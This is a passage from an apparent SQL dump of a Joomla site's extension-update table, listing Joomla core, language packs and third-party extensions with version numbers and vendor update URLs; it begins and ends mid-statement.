package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(19505,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19506,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19507,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(19508,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(19509,3,0,'French','','pkg_fr-FR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(19510,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(19511,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(19512,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(19513,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(19514,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(19515,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(19516,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(19517,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(19518,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(19519,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(19520,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(19521,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(19522,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(19523,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(19524,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(19525,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(19526,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(19527,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(19528,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(19529,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(19530,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(19531,3,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(19532,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(19533,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(19534,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(19535,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(19536,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(19537,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(19538,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(19539,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(19540,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(19541,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(19542,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(19543,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(19544,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(19545,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(19546,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(19547,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(19548,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(19549,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(19550,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(19551,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(19552,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(19553,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(19554,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(19555,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(19556,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19557,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(19558,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(19559,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(19560,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(19561,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(19562,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(19563,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(19564,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(19565,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(19566,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(19567,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(19568,57,0,'French','','pkg_fr-FR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(19569,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(19570,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(19571,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(19572,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(19573,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(19574,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(19575,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(19576,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(19577,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(19578,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(19579,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(19580,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(19581,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(19582,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(19583,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(19584,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(19585,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(19586,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(19587,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(19588,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(19589,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(19590,57,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(19591,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(19592,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(19593,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(19594,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(19595,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(19596,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(19597,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(19598,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(19599,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(19600,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(19601,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(19602,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(19603,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(19604,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(19605,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(19606,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(19607,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(19608,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(19609,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(19610,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(19611,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(19612,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(19613,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(19614,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(19615,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(19616,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.0.13','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/download/fef/1-0-13.html',''),(19617,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.3.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(19618,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(19619,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19620,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(19621,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19622,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19623,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19624,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19625,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(19626,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19627,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19628,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19629,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19630,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(19631,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19632,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(19633,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(19634,3,0,'French','','pkg_fr-FR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(19635,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(19636,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(19637,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(19638,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(19639,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(19640,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(19641,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(19642,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(19643,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(19644,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(19645,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(19646,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(19647,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(19648,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(19649,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(19650,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(19651,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(19652,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(19653,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(19654,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(19655,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(19656,3,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(19657,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(19658,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(19659,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(19660,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(19661,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(19662,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(19663,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(19664,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(19665,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(19666,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(19667,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(19668,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(19669,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(19670,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(19671,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(19672,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(19673,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(19674,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(19675,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(19676,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(19677,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(19678,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(19679,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(19680,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(19681,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19682,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(19683,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(19684,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(19685,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(19686,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(19687,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(19688,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(19689,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(19690,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(19691,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(19692,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(19693,57,0,'French','','pkg_fr-FR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(19694,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(19695,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(19696,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(19697,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(19698,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(19699,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(19700,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(19701,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(19702,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(19703,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(19704,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(19705,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(19706,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(19707,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(19708,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(19709,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(19710,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(19711,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(19712,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(19713,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(19714,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(19715,57,0,'English 